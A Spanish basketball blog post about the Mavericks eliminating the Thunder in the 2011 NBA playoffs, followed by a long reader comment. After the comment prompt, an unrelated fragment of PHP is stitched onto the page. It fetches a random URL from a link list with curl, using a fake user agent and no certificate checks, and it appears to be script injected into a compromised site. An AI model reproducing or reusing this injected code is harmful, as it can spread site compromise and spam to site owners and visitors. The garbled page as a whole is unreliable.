Playoffs (25/05/2011): La suerte siempre favorece al preparado

26 de May de 2011 por txusma

Y se acabó. Los Mavs llegan a la final de la NBA gracias, entre otras muchas cosas, a una mayor experiencia en los momentos decisivos. Los Thunder se ham demostrado muy pardillos en los últimos minutos y Nowitzki y sus compañeros se han aprovechado de ello. Si en el cuarto partido perdieron una renta de 15 puntos en 5 minutos, anoche se dejaron remontar de nuevo los 6 puntos de diferencia que tenían a falta de 4 minutos. No fue tan espectacular como el día anterior pero duele lo mismo. Psicológicamente es para estar tocado.

Esta vez Dirk estuvo algo más comedido gracias a la buena defensa de Nick Collison pero apareció de nuevo cuando la pelota quema y los compañeros te buscan desesperadamente. Con 2 abajo a falta de 1:14 conectó un triple desde la frontal que valió su peso en oro y prácticamente finquitó el partido. Los intentos de los Thunder por recuperar la iniciativa fueron casi patéticos, muy mal jugados, como en todas las ocasiones que se han visto en estas tesituras durante la serie (96-100).

De todas maneras el hombre más destacado de Dallas fue Shawn Marion, pletórico en el último cuarto, que se ha mostrado clave en el devenir de la serie. Por los Thunder, Westbrook anotó 31 pero tiró 28 veces y Durant consiguió 23 puntos en 20 lanzamientos. Oklahoma ha demostrado tener más recursos que sus 2 All-Stars y no los ha aprovechado nada bien. Tienen de qué reflexionar este verano.

Y no podemos dejar de anunciar la noticia del día: Mike Brown, ex técnico de Lebron James en los Cavs, dirigirá a los Lakers a cambio de 18’5 millones en 4 años. Me da que las huellas de Phil Jackson serán borradas mucho más rápido de lo previsto.

PREMIOS

MVP: Shawn Marion se fue a los 26 puntos, 8 rebotes, 3 asistencias, 1 robo y 3 tapones, con una gran actuación en el último y decisivo cuarto del partido. ¡Quien lo iba a decir!

Sorpresa: JJ Barea ya ha dejado de ser sorpresa (14 puntos, 4 rebotes y 5 asistencias anoche) así que lo obligatorio ha de ser destacar el partidazo de Nick Collison. 12 puntos, 12 rebotes, 2 robos, 2 tapones y una fenomenal defensa sobre Dirk Nowitzki.

Decepción: Kendrick Perkins fue fichado por los Thunder para convertirse en la pieza que les faltaba para optar a todo. A la práctica el impacto del ex de Boston ha sido menor del esperado. Ayer se quedó sin anotar y ha sido superado por Tyson Chandler en toda la serie.

Esfuerzo en vano: Esta serie nos ha servido para confirmar la importancia que tiene James Harden en los Thunder. Anoche fueron 23 puntos (7 de 11), 5 rebotes y 6 asistencias jugando una muy defensa. Habrá que ver si de cara al año que viene aumentan sus responsabilidades.

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. GreenPride dice:
    #1

    Pues se acabó lo que se daba en el Oeste. Dallas se ha ganado con creces su vuelta a las Finales de la NBA y veremos si acaban por fin con una historia negra que empezó en aquellas otras Finales de 2006 y probablemente contra el mismo equipo (Miami) que entonces les quitó el título de las manos. Finales repletas de morbo y cuentas pendientes y posiblemente última oportunidad para dos grandísimos jugadores como Kidd y Nowitzki de no retirarse sin ganar el anillo.
    En cuanto al partido de ayer fue una nueva demostración de que la experiencia y el saber estar en los playoffs son muy importantes llegados los momentos de la verdad. Se está viendo repetidamente este año como equipos jóvenes como Chicago y Oklahoma no están pudiendo resolver sus ataques en los finales apretados mientras que los más veteranos tienen más tranquilidad y menos ansiedad para resolver.
    Antes de llegar a ese punto vimos una variación que casi hace ganar el partido a los Thunder. Con las faltas de Ibaka y la nulidad de Perkins (para mi un jugador muy sobrevalorado), Brooks se decidió por dejar a Collison de pivot y poner una unidad de pequeños con Maynor, Harden, Westbrook y Durant. La jugada le sirvió para ponerse por delante ayudado por el inmenso partido de Harden y quitando el balón de manos de Westbrook y Durant para iniciar la jugada. Esto hizo el ataque de Oklahoma más fluido y con muchas menos pérdidas y les puso por delante hasta el final aunque sin poder despegarse de un equipo de Dallas apoyado en el gran Robin Hood y en el trabajo impresionante de un Shawn Marion rejuvenecido en estas series. Sin embargo una vez llegado el final los Thunder volvieron a decidir mal sus tiros y Dirk y Marion no perdonaron en el otro lado. Enorme Dirk que tras fallar un triple a 1:20 del final y 2 abajo cogió el balón salido del rebote y se jugó otro para poner por delante a Dallas. Eso es confianza en sus posibilidades. Partidazo de Barea que volvió loco a Maynor y rebotes muy importantes ganados por Dallas en las jugadas finales.
    Vuelta a las Finales de los Mavs, veremos si esta vez con final diferente. Para empezar, esta vez jugarán con desventaja de campo pero el gran Dirk parece preparado para el asalto.
    Y una última cosa, según se dijo anoche en ESPN, Ettore Messina será uno de los ayudantes de Mike Brown en el banquillo de los Lakers. Se embarca así el bueno de Ettore en su intención de llegar a ser primer entrenador de la NBA dentro de poco. Veremos como le va la cosa al lado de Mike Brown que bien haría en hacer caso del bueno de Ettore en sus sistemas ofensivos que en los Cavs eran bastante pobres.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>